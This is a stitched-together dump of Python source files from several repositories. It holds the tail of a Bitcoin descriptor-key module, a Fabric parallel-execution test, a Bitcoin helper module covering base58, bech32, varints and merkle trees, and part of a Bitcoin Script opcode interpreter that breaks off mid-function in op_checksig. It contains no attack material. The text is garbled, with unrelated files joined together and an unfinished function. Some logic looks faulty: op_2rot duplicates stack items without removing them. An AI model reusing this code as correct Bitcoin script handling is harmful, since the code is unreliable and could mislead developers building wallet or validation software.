if self.fingerprint != derivation_path.fingerprint:
return None
origin = self.origin.derivation
if origin == derivation_path.derivation[: len(origin)]:
rest = derivation_path.derivation[len(origin) :]
if self.allowed_derivation is None:
return None
return self.allowed_derivation.check_derivation(rest)
def sec(self):
return self.key.sec()
def serialize(self):
return self.sec()
def compile(self):
d = self.serialize()
return compact.to_bytes(len(d)) + d
@property
def prefix(self):
if self.origin:
return "[%s]" % self.origin
return ""
@property
def suffix(self):
return "" if self.allowed_derivation is None else str(self.allowed_derivation)
@property
def can_derive(self):
return self.allowed_derivation is not None and hasattr(self.key, "derive")
@property
def branches(self):
return self.allowed_derivation.branches if self.allowed_derivation else None
@property
def num_branches(self):
return 1 if self.branches is None else len(self.branches)
def branch(self, branch_index=None):
der = self.allowed_derivation.branch(branch_index)
return type(self)(self.key, self.origin, der)
@property
def is_wildcard(self):
return self.allowed_derivation.is_wildcard if self.allowed_derivation else False
def derive(self, idx, branch_index=None):
# nothing to derive
if self.allowed_derivation is None:
return self
der = self.allowed_derivation.fill(idx, branch_index=branch_index)
k = self.key.derive(der)
if self.origin:
origin = KeyOrigin(self.origin.fingerprint, self.origin.derivation + der)
else:
origin = KeyOrigin(self.key.child(0).fingerprint, der)
# empty derivation
derivation = None
return type(self)(k, origin, derivation)
@property
def is_private(self):
return isinstance(self.key, ec.PrivateKey) or (
self.is_extended and self.key.is_private
)
@property
def private_key(self):
if not self.is_private:
raise ArgumentError("Key is not private")
# either HDKey.key or just the key
return self.key.key if self.is_extended else self.key
@property
def secret(self):
return self.private_key.secret
def to_string(self, version=None):
if isinstance(self.key, ec.PublicKey):
return self.prefix + hexlify(self.key.sec()).decode()
if isinstance(self.key, bip32.HDKey):
return self.prefix + self.key.to_base58(version) + self.suffix
if isinstance(self.key, ec.PrivateKey):
return self.prefix + self.key.wif()
return self.prefix + self.key
@classmethod
def from_string(cls, s):
return cls.parse(s.encode())
class KeyHash(Key):
@classmethod
def parse_key(cls, k: bytes):
# convert to string
k = k.decode()
# raw 20-byte hash
if len(k) == 40:
return k
if len(k) in [66, 130] and k[:2] in ["02", "03", "04"]:
# bare public key
return ec.PublicKey.parse(unhexlify(k))
elif k[1:4] in ["pub", "prv"]:
# bip32 key
return bip32.HDKey.from_base58(k)
else:
return ec.PrivateKey.from_wif(k)
def serialize(self):
if isinstance(self.key, str):
return unhexlify(self.key)
return hashes.hash160(self.key.sec())
def __len__(self):
return 21 # <20:pkh>
def compile(self):
d = self.serialize()
return compact.to_bytes(len(d)) + d
class Number(DescriptorBase):
def __init__(self, num):
self.num = num
@classmethod
def read_from(cls, s):
num = 0
char = s.read(1)
while char in b"0123456789":
num = 10 * num + int(char.decode())
char = s.read(1)
s.seek(-1, 1)
return cls(num)
def compile(self):
if self.num == 0:
return b"\x00"
if self.num <= 16:
return bytes([80 + self.num])
b = self.num.to_bytes(32, "little").rstrip(b"\x00")
if b[-1] >= 128:
b += b"\x00"
return bytes([len(b)]) + b
def __len__(self):
return len(self.compile())
def __str__(self):
return "%d" % self.num
class Raw(DescriptorBase):
def __init__(self, raw):
if len(raw) != self.LEN * 2:
raise ArgumentError("Invalid raw element length: %d" % len(raw))
self.raw = unhexlify(raw)
@classmethod
def read_from(cls, s):
return cls(s.read(2 * cls.LEN).decode())
def __str__(self):
return hexlify(self.raw).decode()
def compile(self):
return compact.to_bytes(len(self.raw)) + self.raw
def __len__(self):
return len(compact.to_bytes(self.LEN)) + self.LEN
class Raw32(Raw):
LEN = 32
def __len__(self):
return 33
class Raw20(Raw):
LEN = 20
def __len__(self):
return 21
``` |
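A minimal usage sketch for the derivation-template logic above, assuming the file is importable as `embit.descriptor.arguments` (the import path is inferred from the file header and is not confirmed here):

```python
# Hypothetical usage sketch for AllowedDerivation; the import path is assumed.
from embit.descriptor.arguments import AllowedDerivation

# "{0,1}/*": the first index must be 0 or 1 (a branch set), the second is a wildcard
ad = AllowedDerivation.from_string("{0,1}/*")

print(str(ad))                       # /{0,1}/*
print(ad.fill(5, branch_index=1))    # [1, 5] - branch 1, wildcard filled with 5
print(ad.check_derivation([0, 7]))   # (0, 7) - branch index 0, wildcard index 7
print(ad.check_derivation([2, 7]))   # None - 2 is not an allowed branch
```

The same fill/check pair is what `Key.derive` and `Key.check_derivation` rely on when a descriptor key carries a `/{0,1}/*` style suffix.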
{
"source": "jimmysong/fabric",
"score": 2
} |
#### File: fabric/tests/test_parallel.py
```python
from __future__ import with_statement
from fabric.api import run, parallel, env, hide
from utils import FabricTest, eq_
from server import server, RESPONSES
class TestParallel(FabricTest):
@server()
@parallel
def test_parallel(self):
"""
Want to do a simple call and respond
"""
env.pool_size = 10
cmd = "ls /simple"
with hide('everything'):
eq_(run(cmd), RESPONSES[cmd])
``` |
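For context, a minimal Fabric 1.x sketch of the decorator exercised by this test; the host names are placeholders and the exact pooling behaviour depends on the installed Fabric version:

```python
# fabfile.py - hypothetical hosts, Fabric 1.x API assumed
from fabric.api import env, parallel, run

env.hosts = ['web1.example.com', 'web2.example.com', 'web3.example.com']

@parallel(pool_size=2)  # run on at most 2 hosts concurrently
def uname():
    run('uname -s')
```

Invoked as `fab uname`, the task runs against every host in `env.hosts`, with `pool_size` capping concurrency much like `env.pool_size` does in the test above.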
{
"source": "jimmysong/-minipy",
"score": 2
} |
#### File: jimmysong/-minipy/helper.py
```python
import hashlib
import hmac
from base64 import b64decode, b64encode
from glob import glob
from io import BufferedIOBase
from os import unlink
from os.path import exists
from pbkdf2 import PBKDF2
from typing import Any, Dict, List, Optional, Tuple
BASE58_ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
BECH32_ALPHABET = 'qpzry9x8gf2tvdw0s3jn54khce6mua7l'
GEN = [0x3b6a57b2, 0x26508e6d, 0x1ea119fa, 0x3d4233dd, 0x2a1462b3]
PBKDF2_ROUNDS = 2048
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
def base64_encode(b: bytes) -> str:
return b64encode(b).decode('ascii')
def base64_decode(s: str) -> bytes:
return b64decode(s)
# next four functions are straight from BIP0173:
# https://github.com/bitcoin/bips/blob/master/bip-0173.mediawiki
def bech32_polymod(values: List[int]) -> int:
chk = 1
for v in values:
b = (chk >> 25)
chk = (chk & 0x1ffffff) << 5 ^ v
for i in range(5):
chk ^= GEN[i] if ((b >> i) & 1) else 0
return chk
def bech32_hrp_expand(s: str) -> List[int]:
b = s.encode('ascii')
return [x >> 5 for x in b] + [0] + [x & 31 for x in b]
def bech32_verify_checksum(hrp: str, data: List[int]) -> bool:
return bech32_polymod(bech32_hrp_expand(hrp) + data) == 1
def bech32_create_checksum(hrp: str, data: List[int]) -> List[int]:
values = bech32_hrp_expand(hrp) + data
polymod = bech32_polymod(values + [0, 0, 0, 0, 0, 0]) ^ 1
return [(polymod >> 5 * (5 - i)) & 31 for i in range(6)]
def big_endian_to_int(b: bytes) -> int:
    '''big_endian_to_int takes a byte sequence as a big-endian number.
    Returns an integer'''
# use the int.from_bytes(b, <endianness>) method
return int.from_bytes(b, 'big')
def bit_field_to_bytes(bit_field: List[int]) -> bytes:
if len(bit_field) % 8 != 0:
raise RuntimeError(
'bit_field does not have a length that is divisible by 8')
result = bytearray(len(bit_field) // 8)
for i, bit in enumerate(bit_field):
byte_index, bit_index = divmod(i, 8)
if bit:
result[byte_index] |= 1 << bit_index
return bytes(result)
def byte_to_int(b: bytes) -> int:
'''Returns an integer that corresponds to the byte'''
return b[0]
def bytes_to_bit_field(some_bytes: bytes) -> List[int]:
flag_bits = []
# iterate over each byte of flags
for byte in some_bytes:
# iterate over each bit, right-to-left
for _ in range(8):
# add the current bit (byte & 1)
flag_bits.append(byte & 1)
# rightshift the byte 1
byte >>= 1
return flag_bits
def check_not_exists(*filenames) -> None:
for filename in filenames:
if exists(filename):
raise IOError(f'file {filename} already exists')
def choice_menu(items: List[Any], exit_option: bool = False) -> Any:
if exit_option:
print('0. Exit')
if len(items) == 1:
return items[0]
for i, item in enumerate(items):
print(f'{i+1}. {item}')
while True:
choice = int(input('Please make your choice: '))
if exit_option and choice == 0:
return None
if 0 <= choice - 1 < len(items):
return items[choice - 1]
def choose_file(extension: str) -> Optional[str]:
choices = glob(f'*.{extension}')
if len(choices) == 0:
print(f'No {extension} file in this directory')
return None
else:
return choice_menu(choices)
def decode_base58(s: str) -> bytes:
return raw_decode_base58(s)[1:]
def decode_bech32(s: str) -> Tuple[bool, int, bytes]:
'''Returns whether it's testnet, segwit version and the hash from the bech32 address'''
hrp, raw_data = s.split('1')
if hrp == 'tb':
testnet = True
elif hrp == 'bc':
testnet = False
else:
raise ValueError(f'unknown human readable part: {hrp}')
data = [BECH32_ALPHABET.index(c) for c in raw_data]
if not bech32_verify_checksum(hrp, data):
raise ValueError(f'bad address: {s}')
version = data[0]
number = 0
for digit in data[1:-6]:
number = (number << 5) | digit
num_bytes = (len(data) - 7) * 5 // 8
bits_to_ignore = (len(data) - 7) * 5 % 8
number >>= bits_to_ignore
h = int_to_big_endian(number, num_bytes)
if num_bytes < 2 or num_bytes > 40:
raise ValueError(f'bytes out of range: {num_bytes}')
return testnet, version, h
def delete_files(*filenames) -> None:
for filename in filenames:
if exists(filename):
unlink(filename)
def encode_base58(s: bytes) -> str:
# determine how many 0 bytes (b'\x00') s starts with
count = 0
for c in s:
if c == 0:
count += 1
else:
break
# convert from binary to hex, then hex to integer
num = int(s.hex(), 16)
result = ''
prefix = '1' * count
while num > 0:
num, mod = divmod(num, 58)
result = BASE58_ALPHABET[mod] + result
return prefix + result
def encode_base58_checksum(raw: bytes) -> str:
'''Takes bytes and turns it into base58 encoding with checksum'''
# checksum is the first 4 bytes of the hash256
checksum = hash256(raw)[:4]
# encode_base58 on the raw and the checksum
return encode_base58(raw + checksum)
def encode_bech32(nums: List[int]) -> str:
'''Convert from 5-bit array of integers to bech32 format'''
result = ''
for n in nums:
result += BECH32_ALPHABET[n]
return result
def encode_bech32_checksum(s: bytes, testnet: bool = False) -> str:
'''Convert a segwit ScriptPubKey to a bech32 address'''
if testnet:
prefix = 'tb'
else:
prefix = 'bc'
version = s[0]
if version > 0:
version -= 0x50
length = s[1]
data = [version] + group_32(s[2:2 + length])
checksum = bech32_create_checksum(prefix, data)
bech32 = encode_bech32(data + checksum)
return prefix + '1' + bech32
def encode_dict(d: Dict[bytes, Any]) -> bytes:
return encode_list(d.values())
def encode_list(l: Any) -> bytes:
result = encode_varint(len(l))
for item in l:
result += item.serialize()
return result
def encode_varint(i: int) -> bytes:
'''encodes an integer as a varint'''
if i < 0xfd:
return bytes([i])
elif i < 0x10000:
return b'\xfd' + int_to_little_endian(i, 2)
elif i < 0x100000000:
return b'\xfe' + int_to_little_endian(i, 4)
elif i < 0x10000000000000000:
return b'\xff' + int_to_little_endian(i, 8)
else:
raise RuntimeError(f'integer too large: {i}')
def encode_varstr(b: bytes) -> bytes:
'''encodes bytes as a varstr'''
# encode the length of the string using encode_varint
result = encode_varint(len(b))
# add the bytes
result += b
# return the whole thing
return result
def group_32(s: bytes) -> List[int]:
'''Convert from 8-bit bytes to 5-bit array of integers'''
result = []
unused_bits = 0
current = 0
for c in s:
unused_bits += 8
current = (current << 8) + c
while unused_bits > 5:
unused_bits -= 5
result.append(current >> unused_bits)
mask = (1 << unused_bits) - 1
current &= mask
result.append(current << (5 - unused_bits))
return result
def hash160(s: bytes) -> bytes:
return hashlib.new('ripemd160', hashlib.sha256(s).digest()).digest()
def hash256(s: bytes) -> bytes:
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
def hmac_sha512(key: bytes, msg: bytes) -> bytes:
return hmac.HMAC(key=key, msg=msg, digestmod=hashlib.sha512).digest()
def hmac_sha512_kdf(msg: str, salt: bytes) -> bytes:
return PBKDF2(
msg,
salt,
iterations=PBKDF2_ROUNDS,
macmodule=hmac,
digestmodule=hashlib.sha512,
).read(64)
def int_to_big_endian(n: int, length: int) -> bytes:
    '''int_to_big_endian takes an integer and returns the big-endian
    byte sequence of length'''
# use the int.to_bytes(length, <endianness>) method
return n.to_bytes(length, 'big')
def int_to_byte(n: int) -> bytes:
'''Returns a single byte that corresponds to the integer'''
if n > 255 or n < 0:
raise ValueError(
'integer greater than 255 or lower than 0 cannot be converted into a byte'
)
return bytes([n])
def int_to_little_endian(n: int, length: int) -> bytes:
'''int_to_little_endian takes an integer and returns the little-endian
byte sequence of length'''
# use the int.to_bytes(length, <endianness>) method
return n.to_bytes(length, 'little')
def little_endian_to_int(b: bytes) -> int:
'''little_endian_to_int takes byte sequence as a little-endian number.
Returns an integer'''
# use the int.from_bytes(b, <endianness>) method
return int.from_bytes(b, 'little')
def merkle_parent(hash1: bytes, hash2: bytes) -> bytes:
'''Takes the binary hashes and calculates the hash256'''
# return the hash256 of hash1 + hash2
return hash256(hash1 + hash2)
def merkle_parent_level(hashes: List[bytes]) -> List[bytes]:
'''Takes a list of binary hashes and returns a list that's half
the length'''
# if the list has exactly 1 element raise an error
if len(hashes) == 1:
raise RuntimeError('Cannot take a parent level with only 1 item')
# if the list has an odd number of elements, duplicate the last one
# and put it at the end so it has an even number of elements
if len(hashes) % 2 == 1:
hashes.append(hashes[-1])
# initialize parent level
parent_level = []
# loop over every pair (use: for i in range(0, len(hashes), 2))
for i in range(0, len(hashes), 2):
# get the merkle parent of i and i+1 hashes
parent = merkle_parent(hashes[i], hashes[i + 1])
# append parent to parent level
parent_level.append(parent)
# return parent level
return parent_level
def merkle_root(hashes: List[bytes]) -> bytes:
'''Takes a list of binary hashes and returns the merkle root
'''
# current level starts as hashes
current_level = hashes
# loop until there's exactly 1 element
while len(current_level) > 1:
# current level becomes the merkle parent level
current_level = merkle_parent_level(current_level)
# return the 1st item of current_level
return current_level[0]
def murmur3(data: bytes, seed: int = 0) -> int:
'''from http://stackoverflow.com/questions/13305290/is-there-a-pure-python-implementation-of-murmurhash'''
c1 = 0xcc9e2d51
c2 = 0x1b873593
length = len(data)
h1 = seed
roundedEnd = (length & 0xfffffffc) # round down to 4 byte block
for i in range(0, roundedEnd, 4):
# little endian load order
k1 = (data[i] & 0xff) | ((data[i + 1] & 0xff) << 8) | \
((data[i + 2] & 0xff) << 16) | (data[i + 3] << 24)
k1 *= c1
k1 = (k1 << 15) | ((k1 & 0xffffffff) >> 17) # ROTL32(k1,15)
k1 *= c2
h1 ^= k1
h1 = (h1 << 13) | ((h1 & 0xffffffff) >> 19) # ROTL32(h1,13)
h1 = h1 * 5 + 0xe6546b64
# tail
k1 = 0
val = length & 0x03
if val == 3:
k1 = (data[roundedEnd + 2] & 0xff) << 16
# fallthrough
if val in [2, 3]:
k1 |= (data[roundedEnd + 1] & 0xff) << 8
# fallthrough
if val in [1, 2, 3]:
k1 |= data[roundedEnd] & 0xff
k1 *= c1
k1 = (k1 << 15) | ((k1 & 0xffffffff) >> 17) # ROTL32(k1,15)
k1 *= c2
h1 ^= k1
# finalization
h1 ^= length
# fmix(h1)
h1 ^= ((h1 & 0xffffffff) >> 16)
h1 *= 0x85ebca6b
h1 ^= ((h1 & 0xffffffff) >> 13)
h1 *= 0xc2b2ae35
h1 ^= ((h1 & 0xffffffff) >> 16)
return h1 & 0xffffffff
def raw_decode_base58(s: str) -> bytes:
num = 0
# see how many leading 0's we are starting with
prefix = b''
for c in s:
if num == 0 and c == '1':
prefix += b'\x00'
else:
num = 58 * num + BASE58_ALPHABET.index(c)
    # convert the accumulated number into bytes
byte_array = []
while num > 0:
byte_array.insert(0, num & 255)
num >>= 8
combined = prefix + bytes(byte_array)
checksum = combined[-4:]
if hash256(combined[:-4])[:4] != checksum:
        raise RuntimeError(f'bad address: {checksum} {hash256(combined[:-4])[:4]}')
return combined[:-4]
def read_dict(s: BufferedIOBase, cls: Any) -> Dict[bytes, Any]:
return {item.key(): item for item in read_list(s, cls)}
def read_list(s: BufferedIOBase, cls: Any) -> Any:
num_items = read_varint(s)
return [cls.parse(s) for _ in range(num_items)]
def read_varint(s: BufferedIOBase) -> int:
'''reads a variable integer from a stream'''
b = s.read(1)
if len(b) != 1:
raise IOError('stream has no bytes')
i = b[0]
if i == 0xfd:
# 0xfd means the next two bytes are the number
return little_endian_to_int(s.read(2))
elif i == 0xfe:
# 0xfe means the next four bytes are the number
return little_endian_to_int(s.read(4))
elif i == 0xff:
# 0xff means the next eight bytes are the number
return little_endian_to_int(s.read(8))
else:
# anything else is just the integer
return i
def read_varstr(s: BufferedIOBase) -> bytes:
'''reads a variable string from a stream'''
# remember that s.read(n) will read n bytes from the stream
# find the length of the string by using read_varint on the string
item_length = read_varint(s)
# read that many bytes from the stream
return s.read(item_length)
def serialize_key_value(key: bytes, value: bytes) -> bytes:
return encode_varstr(key) + encode_varstr(value)
def sha256(s: bytes) -> bytes:
return hashlib.sha256(s).digest()
```
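A short round-trip sketch of the serialization helpers above, assuming the file is importable as `helper` and its `pbkdf2` dependency is installed:

```python
from io import BytesIO
from helper import (
    encode_base58_checksum, raw_decode_base58,
    encode_varint, read_varint,
    hash256, merkle_root,
)

# varint round trip: 70015 needs the 0xfe (4-byte) encoding
raw = encode_varint(70015)
assert read_varint(BytesIO(raw)) == 70015

# base58check round trip: the payload comes back without its 4-byte checksum
payload = b'\x6f' + b'\x00' * 20     # testnet p2pkh version byte + dummy hash160
addr = encode_base58_checksum(payload)
assert raw_decode_base58(addr) == payload

# merkle root of two leaves is just the parent of that single pair
leaves = [hash256(b'tx1'), hash256(b'tx2')]
print(addr, merkle_root(leaves).hex())
```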
#### File: jimmysong/-minipy/op.py
```python
import hashlib
from typing import List
from ecc import (
S256Point,
Signature,
)
from helper import (
hash160,
hash256,
)
from timelock import Locktime, Sequence
def is_number_op_code(op_code: bytes) -> bool:
return op_code in OP_CODE_TO_NUMBER
def number_to_op_code(n: int) -> bytes:
    '''Returns the OP code for a particular number'''
if NUMBER_TO_OP_CODE.get(n) is None:
raise ValueError(f'No OP code exists for {n}')
return NUMBER_TO_OP_CODE[n]
def op_code_to_number(op_code: bytes) -> int:
'''Returns the n for a particular OP code'''
if OP_CODE_TO_NUMBER.get(op_code) is None:
raise ValueError(f'Not a number OP code: {op_code.hex()}')
return OP_CODE_TO_NUMBER[op_code]
def encode_minimal_num(n: int) -> bytes:
if -1 <= n <= 16:
return number_to_op_code(n)
else:
return encode_num(n)
def decode_minimal_num(n: bytes) -> int:
if is_number_op_code(n):
return op_code_to_number(n)
else:
return decode_num(n)
def encode_num(num: int) -> bytes:
if num == 0:
return OP_0
abs_num = abs(num)
negative = num < 0
result = bytearray()
while abs_num:
result.append(abs_num & 0xff)
abs_num >>= 8
# if the top bit is set,
# for negative numbers we ensure that the top bit is set
# for positive numbers we ensure that the top bit is not set
if result[-1] & 0x80:
if negative:
result.append(0x80)
else:
result.append(0)
elif negative:
result[-1] |= 0x80
return bytes(result)
def decode_num(element: bytes) -> int:
if element == OP_0:
return 0
# reverse for big endian
big_endian = element[::-1]
# top bit being 1 means it's negative
if big_endian[0] & 0x80:
negative = True
result = big_endian[0] & 0x7f
else:
negative = False
result = big_endian[0]
for c in big_endian[1:]:
result <<= 8
result += c
if negative:
return -result
else:
return result
def op_0(stack: List[bytes]) -> bool:
stack.append(encode_num(0))
return True
def op_1negate(stack: List[bytes]) -> bool:
stack.append(encode_num(-1))
return True
def op_1(stack: List[bytes]) -> bool:
stack.append(encode_num(1))
return True
def op_2(stack: List[bytes]) -> bool:
stack.append(encode_num(2))
return True
def op_3(stack: List[bytes]) -> bool:
stack.append(encode_num(3))
return True
def op_4(stack: List[bytes]) -> bool:
stack.append(encode_num(4))
return True
def op_5(stack: List[bytes]) -> bool:
stack.append(encode_num(5))
return True
def op_6(stack: List[bytes]) -> bool:
stack.append(encode_num(6))
return True
def op_7(stack: List[bytes]) -> bool:
stack.append(encode_num(7))
return True
def op_8(stack: List[bytes]) -> bool:
stack.append(encode_num(8))
return True
def op_9(stack: List[bytes]) -> bool:
stack.append(encode_num(9))
return True
def op_10(stack: List[bytes]) -> bool:
stack.append(encode_num(10))
return True
def op_11(stack: List[bytes]) -> bool:
stack.append(encode_num(11))
return True
def op_12(stack: List[bytes]) -> bool:
stack.append(encode_num(12))
return True
def op_13(stack: List[bytes]) -> bool:
stack.append(encode_num(13))
return True
def op_14(stack: List[bytes]) -> bool:
stack.append(encode_num(14))
return True
def op_15(stack: List[bytes]) -> bool:
stack.append(encode_num(15))
return True
def op_16(stack: List[bytes]) -> bool:
stack.append(encode_num(16))
return True
def op_nop(stack: List[bytes]) -> bool:
return True
def op_if(stack: List[bytes], items: List[bytes]) -> bool:
if len(stack) < 1:
return False
# go through and re-make the items array based on the top stack element
true_items = []
false_items = []
current_array = true_items
found = False
num_endifs_needed = 1
while len(items) > 0:
item = items.pop(0)
if item in (OP_IF, OP_NOTIF):
# nested if, we have to go another endif
num_endifs_needed += 1
current_array.append(item)
elif num_endifs_needed == 1 and item == OP_ELSE:
current_array = false_items
elif item == OP_ENDIF:
if num_endifs_needed == 1:
found = True
break
else:
num_endifs_needed -= 1
current_array.append(item)
else:
current_array.append(item)
if not found:
return False
element = stack.pop()
if decode_num(element) == 0:
items[:0] = false_items
else:
items[:0] = true_items
return True
def op_notif(stack: List[bytes], items: List[bytes]) -> bool:
if len(stack) < 1:
return False
# go through and re-make the items array based on the top stack element
true_items = []
false_items = []
current_array = true_items
found = False
num_endifs_needed = 1
while len(items) > 0:
item = items.pop(0)
        if item in (OP_IF, OP_NOTIF):
# nested if, we have to go another endif
num_endifs_needed += 1
current_array.append(item)
        elif num_endifs_needed == 1 and item == OP_ELSE:
current_array = false_items
        elif item == OP_ENDIF:
if num_endifs_needed == 1:
found = True
break
else:
num_endifs_needed -= 1
current_array.append(item)
else:
current_array.append(item)
if not found:
return False
element = stack.pop()
if decode_num(element) == 0:
items[:0] = true_items
else:
items[:0] = false_items
return True
def op_verify(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
if decode_num(element) == 0:
return False
return True
def op_return(stack: List[bytes]) -> bool:
return False
def op_toaltstack(stack: List[bytes], altstack: List[bytes]) -> bool:
if len(stack) < 1:
return False
altstack.append(stack.pop())
return True
def op_fromaltstack(stack: List[bytes], altstack: List[bytes]) -> bool:
if len(altstack) < 1:
return False
stack.append(altstack.pop())
return True
def op_2drop(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.pop()
stack.pop()
return True
def op_2dup(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.extend(stack[-2:])
return True
def op_3dup(stack: List[bytes]) -> bool:
if len(stack) < 3:
return False
stack.extend(stack[-3:])
return True
def op_2over(stack: List[bytes]) -> bool:
if len(stack) < 4:
return False
stack.extend(stack[-4:-2])
return True
def op_2rot(stack: List[bytes]) -> bool:
if len(stack) < 6:
return False
stack.extend(stack[-6:-4])
return True
def op_2swap(stack: List[bytes]) -> bool:
if len(stack) < 4:
return False
stack[-4:] = stack[-2:] + stack[-4:-2]
return True
def op_ifdup(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
if decode_num(stack[-1]) != 0:
stack.append(stack[-1])
return True
def op_depth(stack: List[bytes]) -> bool:
stack.append(encode_num(len(stack)))
return True
def op_drop(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
stack.pop()
return True
def op_dup(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
stack.append(stack[-1])
return True
def op_nip(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack[-2:] = stack[-1:]
return True
def op_over(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.append(stack[-2])
return True
def op_pick(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
n = decode_num(stack.pop())
if len(stack) < n + 1:
return False
stack.append(stack[-n - 1])
return True
def op_roll(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
n = decode_num(stack.pop())
if len(stack) < n + 1:
return False
if n == 0:
return True
stack.append(stack.pop(-n - 1))
return True
def op_rot(stack: List[bytes]) -> bool:
if len(stack) < 3:
return False
stack.append(stack.pop(-3))
return True
def op_swap(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.append(stack.pop(-2))
return True
def op_tuck(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.insert(-2, stack[-1])
return True
def op_size(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
stack.append(encode_num(len(stack[-1])))
return True
def op_equal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = stack.pop()
element2 = stack.pop()
if element1 == element2:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_equalverify(stack: List[bytes]) -> bool:
return op_equal(stack) and op_verify(stack)
def op_1add(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = decode_num(stack.pop())
stack.append(encode_num(element + 1))
return True
def op_1sub(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = decode_num(stack.pop())
stack.append(encode_num(element - 1))
return True
def op_negate(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = decode_num(stack.pop())
stack.append(encode_num(-element))
return True
def op_abs(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = decode_num(stack.pop())
if element < 0:
stack.append(encode_num(-element))
else:
stack.append(encode_num(element))
return True
def op_not(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
if decode_num(element) == 0:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_0notequal(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
if decode_num(element) == 0:
stack.append(encode_num(0))
else:
stack.append(encode_num(1))
return True
def op_add(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
stack.append(encode_num(element1 + element2))
return True
def op_sub(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
stack.append(encode_num(element2 - element1))
return True
def op_booland(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 and element2:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_boolor(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 or element2:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_numequal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 == element2:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_numequalverify(stack: List[bytes]) -> bool:
return op_numequal(stack) and op_verify(stack)
def op_numnotequal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 == element2:
stack.append(encode_num(0))
else:
stack.append(encode_num(1))
return True
def op_lessthan(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element2 < element1:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_greaterthan(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element2 > element1:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_lessthanorequal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element2 <= element1:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_greaterthanorequal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element2 >= element1:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_min(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 < element2:
stack.append(encode_num(element1))
else:
stack.append(encode_num(element2))
return True
def op_max(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 > element2:
stack.append(encode_num(element1))
else:
stack.append(encode_num(element2))
return True
def op_within(stack: List[bytes]) -> bool:
if len(stack) < 3:
return False
maximum = decode_num(stack.pop())
minimum = decode_num(stack.pop())
element = decode_num(stack.pop())
if element >= minimum and element < maximum:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_ripemd160(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
stack.append(hashlib.new('ripemd160', element).digest())
return True
def op_sha1(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
stack.append(hashlib.sha1(element).digest())
return True
def op_sha256(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
stack.append(hashlib.sha256(element).digest())
return True
def op_hash160(stack: List[bytes]) -> bool:
# check to see if there's at least 1 element
if len(stack) < 1:
return False
# get the element on the top with stack.pop()
element = stack.pop()
# add the hash160 of the element to the end of the stack
h160 = hash160(element)
stack.append(h160)
return True
def op_hash256(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
stack.append(hash256(element))
return True
def op_checksig(stack: List[bytes], z: int) -> bool:
# check to see if there's at least 2 elements
if len(stack) < 2:
return False
# get the sec_pubkey with stack.pop()
sec_pubkey = stack.pop()
# get the der_signature with stack.pop()[:-1] (last byte is removed)
der_signature = stack.pop()[:-1]
# parse the sec format pubkey with S256Point
point = S256Point.parse(sec_pubkey)
# parse the der format signature with Signature
sig = Signature(der_signature)
# verify using the point, z and signature
# if verified add encode_num(1) to the end, otherwise encode_num(0)
